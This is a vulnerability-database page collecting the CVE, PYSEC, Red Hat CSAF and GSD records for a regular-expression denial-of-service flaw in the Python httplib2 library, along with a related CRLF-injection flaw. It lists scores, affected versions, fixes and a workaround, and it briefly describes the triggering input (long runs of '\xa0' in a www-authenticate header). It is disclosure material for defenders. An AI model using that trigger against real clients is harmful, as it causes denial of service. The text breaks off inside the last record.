cvelistv5 - cve-2021-21240

cve-2021-21240

Vulnerability from cvelistv5

Published

2021-02-08 19:45

Modified

2024-08-03 18:09

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Regular Expression Denial of Service in httplib2

References

URL	Tags
security-advisories@github.com	https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc	Patch, Third Party Advisory
security-advisories@github.com	https://github.com/httplib2/httplib2/pull/182	Patch, Third Party Advisory
security-advisories@github.com	https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m	Exploit, Mitigation, Third Party Advisory
security-advisories@github.com	https://pypi.org/project/httplib2	Product, Third Party Advisory

Impacted products

▼	Vendor	Product
	httplib2	httplib2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T18:09:14.827Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/httplib2/httplib2/pull/182"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://pypi.org/project/httplib2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "httplib2",
          "vendor": "httplib2",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.19.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400 Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-02-08T19:45:19",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/httplib2/httplib2/pull/182"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://pypi.org/project/httplib2"
        }
      ],
      "source": {
        "advisory": "GHSA-93xj-8mrv-444m",
        "discovery": "UNKNOWN"
      },
      "title": "Regular Expression Denial of Service in httplib2",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2021-21240",
          "STATE": "PUBLIC",
          "TITLE": "Regular Expression Denial of Service in httplib2"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "httplib2",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "\u003c 0.19.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "httplib2"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-400 Uncontrolled Resource Consumption"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m",
              "refsource": "CONFIRM",
              "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m"
            },
            {
              "name": "https://github.com/httplib2/httplib2/pull/182",
              "refsource": "MISC",
              "url": "https://github.com/httplib2/httplib2/pull/182"
            },
            {
              "name": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc",
              "refsource": "MISC",
              "url": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc"
            },
            {
              "name": "https://pypi.org/project/httplib2",
              "refsource": "MISC",
              "url": "https://pypi.org/project/httplib2"
            }
          ]
        },
        "source": {
          "advisory": "GHSA-93xj-8mrv-444m",
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2021-21240",
    "datePublished": "2021-02-08T19:45:19",
    "dateReserved": "2020-12-22T00:00:00",
    "dateUpdated": "2024-08-03T18:09:14.827Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-21240\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2021-02-08T20:15:12.197\",\"lastModified\":\"2021-02-12T14:56:39.647\",\"vulnStatus\":\"Analyzed\",\"descriptions\":[{\"lang\":\"en\",\"value\":\"httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \\\"\\\\xa0\\\" characters in the \\\"www-authenticate\\\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.\"},{\"lang\":\"es\",\"value\":\"httplib2 es una biblioteca cliente HTTP completa para Python.\u0026#xa0;En httplib2 anterior a la versi\u00f3n 0.19.0, un servidor malicioso que responde con una larga serie de caracteres \\\"\\\\xa0\\\" en el encabezado \\\"www-authenticate\\\" puede causar una Denegaci\u00f3n de Servicio (CPU quemada mientras analiza el encabezado) del cliente httplib2 que accede a dicho servidor.\u0026#xa0;Esto se corrigi\u00f3 en la versi\u00f3n 0.19.0, que contiene una nueva implementaci\u00f3n de an\u00e1lisis de encabezados de autenticaci\u00f3n usando la biblioteca pyparsing\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:N/I:N/A:P\",\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"PARTIAL\",\"baseScore\":5.0},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:httplib2_project:httplib2:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"0.19.0\",\"matchCriteriaId\":\"D5BA135E-6889-4A5D-88F6-1AD4DBC498BE\"}]}]}],\"references\":[{\"url\":\"https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/pull/182\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Third Party Advisory\"]},{\"url\":\"https://pypi.org/project/httplib2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Third Party Advisory\"]}]}}"
  }
}

pysec-2021-16

Vulnerability from pysec

Published

2021-02-08 20:15

Modified

2021-02-12 14:56

Details

httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of "\xa0" characters in the "www-authenticate" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "httplib2",
        "purl": "pkg:pypi/httplib2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "bd9ee252c8f099608019709e22c0d705e98d26bc"
            }
          ],
          "repo": "https://github.com/httplib2/httplib2",
          "type": "GIT"
        },
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.19.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.7.0",
        "0.7.1",
        "0.7.2",
        "0.7.3",
        "0.7.4",
        "0.7.5",
        "0.7.6",
        "0.7.7",
        "0.8",
        "0.9",
        "0.9.1",
        "0.9.2",
        "0.10.3",
        "0.11.0",
        "0.11.1",
        "0.11.3",
        "0.12.0",
        "0.12.1",
        "0.12.3",
        "0.13.0",
        "0.13.1",
        "0.14.0",
        "0.15.0",
        "0.16.0",
        "0.17.0",
        "0.17.1",
        "0.17.2",
        "0.17.3",
        "0.17.4",
        "0.18.0",
        "0.18.1"
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21240",
    "GHSA-93xj-8mrv-444m"
  ],
  "details": "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.",
  "id": "PYSEC-2021-16",
  "modified": "2021-02-12T14:56:00Z",
  "published": "2021-02-08T20:15:00Z",
  "references": [
    {
      "type": "FIX",
      "url": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/httplib2/httplib2/pull/182"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m"
    },
    {
      "type": "PACKAGE",
      "url": "https://pypi.org/project/httplib2"
    }
  ]
}

rhsa-2021_2116

Vulnerability from csaf_redhat

Published

2021-05-26 11:48

Modified

2024-11-13 22:21

Summary

Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update

Notes

Topic

An update for python-httplib2 is now available for Red Hat OpenStack Platform 16.1 (Train). Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Details

A comprehensive HTTP client library that supports many features left out of other HTTP libraries. Security Fix(es): * CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function (CVE-2020-11078) * Regular expression denial of service via malicious header (CVE-2021-21240) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page listed in the References section.

This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "An update for python-httplib2 is now available for Red Hat OpenStack\nPlatform 16.1 (Train).\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "A comprehensive HTTP client library that supports many features left out of other HTTP libraries.\n\nSecurity Fix(es):\n\n* CRLF injection via an attacker controlled unescaped part of uri for\nhttplib2.Http.request function (CVE-2020-11078)\n\n* Regular expression denial of service via malicious header\n(CVE-2021-21240)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2021:2116",
        "url": "https://access.redhat.com/errata/RHSA-2021:2116"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/#moderate",
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "category": "external",
        "summary": "1845937",
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1845937"
      },
      {
        "category": "external",
        "summary": "1926885",
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1926885"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_2116.json"
      }
    ],
    "title": "Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update",
    "tracking": {
      "current_release_date": "2024-11-13T22:21:52+00:00",
      "generator": {
        "date": "2024-11-13T22:21:52+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "4.2.0"
        }
      },
      "id": "RHSA-2021:2116",
      "initial_release_date": "2021-05-26T11:48:28+00:00",
      "revision_history": [
        {
          "date": "2021-05-26T11:48:28+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2021-05-26T11:48:28+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2024-11-13T22:21:52+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat OpenStack Platform 16.1",
                "product": {
                  "name": "Red Hat OpenStack Platform 16.1",
                  "product_id": "8Base-RHOS-CINDERLIB-16.1",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:redhat:openstack:16.1::el8"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat OpenStack Platform"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python-httplib2-0:0.13.1-2.el8ost.src",
                "product": {
                  "name": "python-httplib2-0:0.13.1-2.el8ost.src",
                  "product_id": "python-httplib2-0:0.13.1-2.el8ost.src",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python-httplib2@0.13.1-2.el8ost?arch=src"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "src"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python3-httplib2-0:0.13.1-2.el8ost.noarch",
                "product": {
                  "name": "python3-httplib2-0:0.13.1-2.el8ost.noarch",
                  "product_id": "python3-httplib2-0:0.13.1-2.el8ost.noarch",
                  "product_identification_helper": {
                    "purl": "pkg:rpm/redhat/python3-httplib2@0.13.1-2.el8ost?arch=noarch"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "noarch"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python-httplib2-0:0.13.1-2.el8ost.src as a component of Red Hat OpenStack Platform 16.1",
          "product_id": "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src"
        },
        "product_reference": "python-httplib2-0:0.13.1-2.el8ost.src",
        "relates_to_product_reference": "8Base-RHOS-CINDERLIB-16.1"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-httplib2-0:0.13.1-2.el8ost.noarch as a component of Red Hat OpenStack Platform 16.1",
          "product_id": "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch"
        },
        "product_reference": "python3-httplib2-0:0.13.1-2.el8ost.noarch",
        "relates_to_product_reference": "8Base-RHOS-CINDERLIB-16.1"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2020-11078",
      "cwe": {
        "id": "CWE-113",
        "name": "Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Request/Response Splitting\u0027)"
      },
      "discovery_date": "2020-05-20T00:00:00+00:00",
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "1845937"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in python-httplib2. An attacker controlling an unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "While Red Hat Quay 3.0, and 3.1 used the httplib2 library it was removed in versions 3.2 and later. Upgrade to 3.2 or later to fix this vulnerability in Red Hat Quay.\n\nRed Hat Gluster Storage 3 delivers the affected version of the python-httplib2 library. However the library is not used by Gluster hence the impact by this vulnerability is low.\n\nThis issue affects the version of the python-httplib2 library as shipped with Red Hat Ceph Storage (RHCS) version 2. Ceph-2 has reached End of Extended Life Cycle Support and no longer fixing moderates/lows.\n\nThere\u0027s currently no known vector to exploit this when using Python versions with CVE-2019-9740 and CVE-2019-9947 fixed.\n\nIn Red Hat OpenStack Platform13, because the flaw has a lower impact and the package\u0027s indirect usage in RHOSP cannot be exploited, no update will be provided at this time for the RHOSP python-httplib2 package.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src",
          "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2020-11078"
        },
        {
          "category": "external",
          "summary": "RHBZ#1845937",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1845937"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2020-11078",
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-11078"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-11078",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11078"
        },
        {
          "category": "external",
          "summary": "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq",
          "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq"
        }
      ],
      "release_date": "2020-05-20T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2021-05-26T11:48:28+00:00",
          "details": "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src",
            "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2021:2116"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src",
            "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function"
    },
    {
      "cve": "CVE-2021-21240",
      "cwe": {
        "id": "CWE-400",
        "name": "Uncontrolled Resource Consumption"
      },
      "discovery_date": "2021-02-09T00:00:00+00:00",
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "1926885"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "An uncontrolled resource consumption flaw as found in python-httplib2, due to a flawed regular expression used while parsing the WWW-Authenticate header in an HTTP response. This flaw allows a malicious or compromised server to reply with a crafted sequence of characters in the WWW-Authenticate header, leading to a denial of service of the httplib2 client accessing the server. The highest threat from this vulnerability is to system availability.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "python-httplib2: Regular expression denial of service via malicious header",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw has been rated as having a security impact of Low, because it requires a malicious or compromised server in order to be exploited, and it only affects the HTTP client. In Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP 13 python-httplib2 package.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src",
          "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2021-21240"
        },
        {
          "category": "external",
          "summary": "RHBZ#1926885",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1926885"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21240",
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-21240"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21240",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21240"
        },
        {
          "category": "external",
          "summary": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m",
          "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m"
        }
      ],
      "release_date": "2021-01-09T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2021-05-26T11:48:28+00:00",
          "details": "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src",
            "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2021:2116"
        },
        {
          "category": "workaround",
          "details": "Use strict mode to parse WWW-Authenticate headers. This can be done by setting `httplib2.USE_WWW_AUTH_STRICT_PARSING = True`. Please note, however, that strict mode might lead to bad results in case of ill-formed header values.",
          "product_ids": [
            "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src",
            "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src",
            "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Low"
        }
      ],
      "title": "python-httplib2: Regular expression denial of service via malicious header"
    }
  ]
}

gsd-2021-21240

Vulnerability from gsd

Modified

2023-12-13 01:23

Details

Aliases

CVE-2021-21240

Aliases

CVE-2021-21240

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2021-21240",
    "description": "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.",
    "id": "GSD-2021-21240",
    "references": [
      "https://www.suse.com/security/cve/CVE-2021-21240.html",
      "https://access.redhat.com/errata/RHSA-2021:2116",
      "https://advisories.mageia.org/CVE-2021-21240.html",
      "https://security.archlinux.org/CVE-2021-21240"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2021-21240"
      ],
